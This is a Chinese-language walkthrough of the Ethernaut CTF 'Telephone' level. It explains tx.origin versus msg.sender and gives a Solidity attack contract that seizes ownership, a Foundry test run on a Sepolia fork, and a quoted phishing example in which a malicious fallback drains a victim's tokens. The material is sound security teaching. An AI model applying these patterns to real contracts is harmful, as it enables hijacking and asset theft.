# Ethernaut CTF Level 4 - Telephone
[toc]
## 題目
取得下面合約的所有權,來完成這一關
```solidity=
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
contract Telephone {
address public owner;
constructor() {
owner = msg.sender;
}
function changeOwner(address _owner) public {
if (tx.origin != msg.sender) {
owner = _owner;
}
}
}
```
<br>
## 分析
可以看到,在`changeOwner()`裡面出現了新的概念
- `msg.sender` vs `tx.origin`
msg.sender:目前函數呼叫的直接傳送者。在合約呼叫鏈中,msg.sender是最近一次呼叫的位址。
tx.origin:交易的原始發起者。無論呼叫鏈有多長,tx.origin始終是最初發起交易的位址。
了解這樣的概念後,再來看這個題目
我們只要創建一個攻擊合約,攻擊和約會呼叫題目中的`changeOwner`
最後,再用帳戶呼叫這個攻擊合約
就可以創造題目要的條件`if (tx.origin != msg.sender)`
<br>
## 攻擊
- 使用了題目的Interface
- 指定題目地址
- `callTelephone`給參數,這邊的參數會是metamask account address
- 可以Deploy後動態帶入
```solidity=
// SPDX-License-Identifier: MIT
pragma solidity >=0.6.12 <0.9.0;
import '@openzeppelin/contracts/utils/math/SafeMath.sol';
interface ITelephone {
function changeOwner(address _owner) external;
}
// Calling real telephone
contract Telephone {
using SafeMath for uint256;
ITelephone public orgContract = ITelephone(0xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx);
function callTelephone(address _attacker) public {
orgContract.changeOwner(_attacker);
}
}
```
完成後Deploy, 並呼叫`callTelephone`
執行後可以回到Ethernaut 用console確認
```solidity
await contract.owner()
```
## 補充
From Ethernaut
這個例子比較簡單,如果沒有搞清楚 tx.origin 和 msg.sender 的差異,可能會導致釣魚攻擊,比說如這個.
下面描述了一個可能的攻擊。
- 使用 tx.origin 來決定轉移誰的代幣,例如:
```solidity
function transfer(address _to, uint _value) {
tokens[tx.origin] -= _value;
tokens[_to] += _value;
}
```
攻擊者讓受害者轉移轉資產到一個惡意合約,這個惡意合約會呼叫代幣合約的 transfer 函式把受害者的資產轉移到惡意合約,例如:
```solidity
function () payable {
token.transfer(attackerAddress, 10000);
}
```
在這個情況下,tx.origin 是受害者的地址 (同時間 msg.sender 是惡意合約的地址),這會導致受害者的資產被轉移到攻擊者的手上.
<br>
## Foundry Test
```solidity=
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;
import "forge-std/Test.sol";
import "forge-std/Vm.sol";
import "../../src/levels/04-Telephone/Telephone.sol";
contract ContractTest is Test {
Telephone level4 =
Telephone(payable(0x5610ca330A030462B9609F74925e5EA86AC08eec));
function setUp() public {
Vm vm = Vm(address(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D));
vm.createSelectFork(vm.rpcUrl("sepolia"));
vm.label(address(this), "Attacker");
vm.label(
address(0x5610ca330A030462B9609F74925e5EA86AC08eec),
"Ethernaut04"
);
}
function testEthernaut04() public {
level4.owner(); // 0x2C2307bb8824a0AbBf2CC7D76d8e63374D2f8446
level4.changeOwner(address(this));
level4.owner(); // address(this)
}
receive() external payable {}
}
```
Sign in via Google
Sign in via Facebook
Sign in via X(Twitter)
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Connect another wallet